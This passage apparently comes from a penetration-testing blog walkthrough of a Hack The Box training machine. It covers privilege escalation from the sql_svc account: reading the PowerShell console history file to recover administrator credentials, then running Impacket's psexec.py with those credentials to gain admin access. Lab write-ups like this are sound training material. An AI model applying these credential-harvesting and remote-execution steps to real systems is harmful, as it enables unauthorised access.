</code></pre><p>I divided up my terminal up to 3 parts using  <a href="https://github.com/tmux/tmux/wiki" rel="noopener noreferrer">Tmux</a> multiplexer.</p><figure class="kg-card kg-image-card"><amp-img src="https://h4rithd.com/blog/content/images/2021/06/image-14.png" class="kg-image" alt width="1555" height="738" srcset="https://h4rithd.com/blog/content/images/size/w600/2021/06/image-14.png 600w, https://h4rithd.com/blog/content/images/size/w1000/2021/06/image-14.png 1000w, https://h4rithd.com/blog/content/images/2021/06/image-14.png 1555w" layout="responsive"></amp-img></figure><p>Woooh!!! We got our shell. 💀 A shell is received as <strong><strong><code>sql_svc</code></strong></strong>, and we can get the user.txt flag.</p><figure class="kg-card kg-image-card"><amp-img src="https://h4rithd.com/blog/content/images/2021/06/image-15.png" class="kg-image" alt width="723" height="448" srcset="https://h4rithd.com/blog/content/images/size/w600/2021/06/image-15.png 600w, https://h4rithd.com/blog/content/images/2021/06/image-15.png 723w" layout="responsive"></amp-img></figure><hr></hr><h2 id="04-privilege-escalation-%E2%80%A6"><strong>04. Privilege Escalation …</strong></h2><p>To escalate privileges we can run different tools. By the way, before run any tool there are some steps that you need to run to enumerate some information. I will be showing you one by one in each walkthroughs.</p><p>Did you remember? now we are in service account called <strong><strong><code>sql_svc</code>. </strong></strong>It's good practice to check recently accessed files/executed commands (<em><em>Keep in mind as good practice</em></em>).  Mostly (default) our console history will be saved in <code>C:\Users\&lt;account_name&gt;\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt</code> . Now you understand what our next step is.</p><p>Right, Let's check above file using <code>type</code> command.</p><pre><code class="language-bash">type C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
</code></pre><p>Here is the output 👇</p><figure class="kg-card kg-image-card"><amp-img src="https://h4rithd.com/blog/content/images/2021/06/image-16.png" class="kg-image" alt width="1000" height="202" srcset="https://h4rithd.com/blog/content/images/size/w600/2021/06/image-16.png 600w, https://h4rithd.com/blog/content/images/2021/06/image-16.png 1000w" layout="responsive"></amp-img></figure><p>Oh no no no noooo.. You see?</p><p>The backup share is mapped with admin credentials. Remember if you saw something like this. ready to launch Impacket's <a href="https://github.com/SecureAuthCorp/impacket/blob/master/examples/psexec.py" rel="noopener noreferrer"><code>psexec.py</code></a> script.</p><pre><code class="language-bash">python3 /usr/share/doc/python3-impacket/examples/psexec.py administrator:MEGACORP_4dm1n\!\!@10.10.10.27
</code></pre><p>Here is the output 👇</p><figure class="kg-card kg-image-card"><amp-img src="https://h4rithd.com/blog/content/images/2021/06/image-17.png" class="kg-image" alt width="1000" height="409" srcset="https://h4rithd.com/blog/content/images/size/w600/2021/06/image-17.png 600w, https://h4rithd.com/blog/content/images/2021/06/image-17.png 1000w" layout="responsive"></amp-img></figure><p>Finally we have Administrator Privileges. 👌 Now we can access the flag on the administrator desktop.</p><figure class="kg-card kg-image-card kg-card-hascaption"><amp-img src="https://h4rithd.com/blog/content/images/2021/06/image-18.png" class="kg-image" alt width="1094" height="614" srcset="https://h4rithd.com/blog/content/images/size/w600/2021/06/image-18.png 600w, https://h4rithd.com/blog/content/images/size/w1000/2021/06/image-18.png 1000w, https://h4rithd.com/blog/content/images/2021/06/image-18.png 1094w" layout="responsive"></amp-img><figcaption>root.txt</figcaption></figure><figure class="kg-card kg-image-card"><amp-img src="https://h4rithd.com/blog/content/images/2021/06/image-19.png" class="kg-image" alt width="867" height="764" srcset="https://h4rithd.com/blog/content/images/size/w600/2021/06/image-19.png 600w, https://h4rithd.com/blog/content/images/2021/06/image-19.png 867w" layout="responsive"></amp-img></figure><figure class="kg-card kg-image-card"><amp-img src="https://h4rithd.com/blog/content/images/2021/06/image-20.png" class="kg-image" alt width="292" height="172" layout="fixed"></amp-img></figure><p>Okay... I’ll see you on the next box! <a href="https://h4rithd.com/blog/starting-point-htb-oopsie-walkthrough/index.html">Oopsie</a> 🙋‍♂️🙋‍♂️</p><p><strong>Find me on </strong><a href="https://twitter.com/ShapManasick" rel="noopener noreferrer">@twitter</a></p>

            </section>

        </article>
    </main>
    <footer class="page-footer">
            <amp-img class="site-icon" src="https://h4rithd.com/blog/content/images/2021/06/favicon.ico" width="50" height="50" layout="fixed"></amp-img>
        <h3>h4rithd.com</h3>
            <p>Penetration Tester | Ethical Hacker | Security Researcher</p>
        <p><a href="../../index.html">Read more posts →</a></p>
        <a class="powered" href="https://ghost.org" target="_blank" rel="noopener"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 156 156"><g fill="none" fill-rule="evenodd"><rect fill="#15212B" width="156" height="156" rx="27"/><g transform="translate(36 36)" fill="#F6F8FA"><path d="M0 71.007A4.004 4.004 0 014 67h26a4 4 0 014 4.007v8.986A4.004 4.004 0 0130 84H4a4 4 0 01-4-4.007v-8.986zM50 71.007A4.004 4.004 0 0154 67h26a4 4 0 014 4.007v8.986A4.004 4.004 0 0180 84H54a4 4 0 01-4-4.007v-8.986z"/><rect y="34" width="84" height="17" rx="4"/><path d="M0 4.007A4.007 4.007 0 014.007 0h41.986A4.003 4.003 0 0150 4.007v8.986A4.007 4.007 0 0145.993 17H4.007A4.003 4.003 0 010 12.993V4.007z"/><rect x="67" width="17" height="17" rx="4"/></g></g></svg> Published with Ghost</a>
    </footer>
    
</body>
</html>
